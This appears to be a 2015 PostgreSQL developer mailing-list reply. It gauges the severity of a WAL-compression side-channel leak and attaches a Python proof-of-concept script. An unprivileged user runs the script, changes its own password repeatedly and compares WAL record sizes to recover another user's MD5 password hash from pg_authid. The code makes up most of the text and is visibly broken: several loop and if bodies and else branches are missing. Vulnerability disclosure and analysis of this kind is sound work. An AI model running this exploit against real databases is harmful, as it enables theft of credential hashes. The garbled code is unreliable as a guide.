On 04/10/2015 05:17 AM, Robert Haas wrote:
I bet that there are at least 1000 covert channel attacks that are
more practically exploitable than this. When this is anywhere near
the top of the list of things to worry about, I recommend we throw a
huge party and then fly home in our faster-than-light starships
which, by then, will probably be available at Walmart.

Let's try to put some perspective on how serious (or not) this leak is. I'm going to use finding a password hash in pg_authid as the target.

After each checkpoint, we can make one "guess", and see how that compresses. If we assume ideal conditions, and guess one hex digit at a time (the md5 hashes are stored as hex strings), you can find a 32 digit hash in 16*32 = 512 checkpoints. You could possible improve on that, by doing a binary search of the digits: first use a "guess" that contains digits 0-8, then 9-f, and find which range the victim was in. The split that range in two, repeat, until you find the digit. With that method, the theoretical minimum is log2(16)*32 = 128 checkpoints.

Obviously, the real world is more complicated and you won't get very close to that ideal case.

For my entertainment, I wrote a little exploit script (attached). I didn't use the binary-search approach, it guesses one digit at a time. Testing on my laptop, in a newly initdb'd database with no other activity, it found a full MD5 hash in 3594 checkpoints. I cheated to make it faster, and used the CHECKPOINT command instead of waiting or writing a lot of WAL, to trigger the checkpoints, but that shouldn't affect the number of checkpoints required. Your mileage may vary, of course, and I'm sure this script will get confused and not work in many cases, but OTOH I'm sure you could also optimize it further.

If we take that ~4000 checkpoints figure, and checkpoint_timeout=5 minutes, it would take about two weeks. But if you're happy with getting just the first 4 or 8 bytes or so, and launch a dictionary attack on that, you can stop much earlier than that.

- Heikki
# Prerequisites:
# Create a user called "eve". The script logs in as that user, and changes
# its password repeatedly. You also need to create a dummy table called
# "garbage", which is used by the script to create some dummy WAL activity.
# CREATE TABLE garbage (t text);
# ALTER TABLE garbage OWNER To eve;
# Usage:
# Edit the connection string below. Launch the script. It will run
# for a long time, printing out a line after each guess (after each
# checkpoint).
# If you want to make the script run faster, you can cheat and grant eve
# superuser privileges, and modify the perform_checkpoint function below
# to use a direct CHECKPOINT command, instead of forcing a checkpoint with
# write activity.
# Caveats:
# There are a lot of things that could confuse the script and stall it:
# * Concurrent update of pg_authid table
# * Other concurrent WAL activity
# * More than one other ueser on the same pg_authid page (or even a dead row)
import psycopg2;
import statistics;

connectstr = "host=localhost dbname=postgres user=eve";

# characters to use for padding our guesses. This needs to be non-repeating
# and not contain hex characters (0-9, a-f), to avoid compression.
paddingstr = "ABCDEFGHIJKLMNOPQRSTUVXYZghijklmnopqrstuvxyz";

# If you have an initial guess of the first N bytes, you can type it here
initial_guess = "md5";

# length of the string we're guessing.
victim_length = 3 + 32;

# How many times to repeat each guess? Increasing this makes the attack take
# longer, but makes it less likely to get confused by small random differences
# in WAL record sizes.
num_repeats = 5;

checkpoints = 0;  # how many checkpoints have we executed so far?

# Perform a checkpoint. We can't just call CHECKPOINT, because that's
# superuser-only. We resort to doing dummy activity until a checkpoint
# is triggered.
# There is also no direct way of detecting when a checkpoint has happened, so
# we take advantage of the WAL compression to detect that. We insert a 1k row
# that compressess well. Normally, the WAL record will take somewhat over 1k
# bytes. But just after a checkpoint has happened, a full-page image is taken,
# and full-page compression is enabled, the WAL record with the compresses to
# much less than 1k bytes.
def perform_checkpoint():
  global checkpoints;
  checkpoints += 1;

  # If you're testing this as superuser, you can cheat and perform direct
  # CHECKPOINT command by uncommenting this. It makes the script run *much*
  # faster.

  conn.autocommit = True;
  c.execute("vacuum garbage");
  conn.autocommit = False;
  c.execute("SELECT pg_current_xlog_insert_location();");
  beforexlog = c.fetchone()[0];
  for i in range(0, 100000):
    c.execute("INSERT INTO garbage VALUES (repeat('x', 1000))");
    c.execute("SELECT pg_current_xlog_insert_location(), pg_current_xlog_insert_location() - %s;", [beforexlog]);
    row = c.fetchone();
    beforexlog = row[0];
    diff = row[1];

    if diff < 1000:

# Insert dummy rows to the "garbage" table until the current XLOG insert
# position is roughly at the beginning of the page. There's a lot of slack
# here, it's enough that the insert position is somewhere fairly early
# in the page, so the the upcoming FPW record of the ALTER USER command won't
# cross the page boundary, messing with our measurements.
def switch_xlog_page():
  while True:
    c.execute("select (pg_current_xlog_insert_location() - '0/0') % 8192");
    xlogpos = c.fetchone()[0];
    if xlogpos < 1000:

    c.execute("INSERT INTO garbage VALUES ('x')");

# Change our password, record the length of the WAL record that creats,
# and roll back.
def guess_password(guess):
  c.execute("SELECT pg_current_xlog_insert_location();");
  beforexlog = c.fetchone()[0];
  c.execute("ALTER USER eve UNENCRYPTED PASSWORD %s", [guess]);
  c.execute("SELECT pg_current_xlog_insert_location() - %s;", [beforexlog]);
  diff = c.fetchone()[0];
  return diff;

# Change the password many times, until the page is pruned. This gives a clean
# slate for the attempt. 
def prune():
  while True:
    if guess_password('x') > 200:

def checkpoint_and_guess(pw):
  return guess_password(pw);

# Given a prefix, the next nibble, and amount of padding, construct the
# next guess.
def construct_guess(known, nibble, padding):
  if nibble == -1:
    c = 'X';
    c = hex(nibble)[2:];

  # Truncate the guess to the last 4 characters. The way the compression
  # algorithm works, it doesn't find common strings smaller than 4 bytes. So
  # by making sure the match is always at most 4 bytes long, we get the maximum
  # distance between a correct and incorrect guess. A correct guess will
  # be compressed to 1 byte, while an incorrect guess is stored uncompressed
  # as 4 bytes. The downside of this is that might get confused if there are
  # repeating patterns of 4 bytes in the victim hash - if we wanted to make
  # this more robust, we try longer strings if this method fails.
  return ("md5" + known + c)[-4:] + paddingstr[:padding];

# Find a useful amount of padding to use for the next guess.
# We pad the guess with N uncompressable bytes, so that the WAL record size
# of the FPW is just on the edge of an alignment boundary. That way, if we
# guess the next nibble correctly and the FPW to compresses one byte better
# than usual, that will result in the aligned WAL record to also be smaller,
# and not be masked away by the alignment padding of the WAL record size.
def find_padding(known, begin):
  prev_len = -1;
  for padding in range(begin, len(paddingstr)):
    pw = construct_guess(known, -1, padding);

    while True:
      len1 = checkpoint_and_guess(pw);
      print ("padding guess: %s - %d" % (pw, len1));
      len2 = checkpoint_and_guess(pw);
      print ("padding guess: %s - %d" % (pw, len2));
      if len1 != len2:

    if prev_len == len1 or prev_len == -1:
      prev_len = len1;
      return padding;
  print("Wrapped around padding. Looks like we're not making progress...");
  return find_padding(known, 0);

# Try to guess the next nibble, using 'padding' bytes of padding at the end.
def guess_set(known, padding):
  diffs = [];
  sizes = [];
  guess_totals = [];

  # Make a guess for each nibble, repeating each guess a few times to average
  # away any outliers.
  for guess in range(0, 16):
    guess_total = 0;
    for repeats in range(0, num_repeats):
      pw = construct_guess(known,guess, padding);

      while True:
        len = checkpoint_and_guess(pw);

        # Very small values are not believable. We probably didn't get a FPW.
        # Repeat.
        if len < 200:

      diffs.append([len, guess]);
      print('{0:s}: WAL size {1}'.format(pw, len));
      guess_total += len;

    guess_totals.append(guess_total / num_repeats);

  # Ok, we now have the average size of the record for every possible value
  # (0-f) of the next nibble. If one of the sizes is significantly smaller
  # than the median, that's the correct nibble we're looking for. If none
  # of the nibbles seem better than the others, we're none the wise. In
  # that case, return None, and let the caller try something else.
  len_median = statistics.median(sizes);
  print("median: " + str(len_median));
  best_guess = 0;
  for i in range(0, 16):
    print("diff %s%s: %d" % (known, hex(i)[2:], guess_totals[i] - len_median));
    if guess_totals[i] < guess_totals[best_guess]:
      best_guess = i;

  if guess_totals[best_guess] < len_median - 5:
    return best_guess;
    return None;

# Try to guess the next nibble.
def guess_next_nibble(known):
  padding = 0;
  while True:
    padding = find_padding(known, padding);
    print("Attempting to guess next nibble with padding {0}".format(padding));
    best = guess_set(known, padding);
    if best != None:
      return hex(best)[2:];
    # otherwise, this guess didn't give us any new information. Try again with
    # a different amount of padding

conn = psycopg2.connect(connectstr);
c = conn.cursor();


known = initial_guess;

while len(known) < victim_length:
  known = known + guess_next_nibble(known);
  print('Got next nibble. Known so far: %s (%d checkpoints)' % (known, checkpoints));
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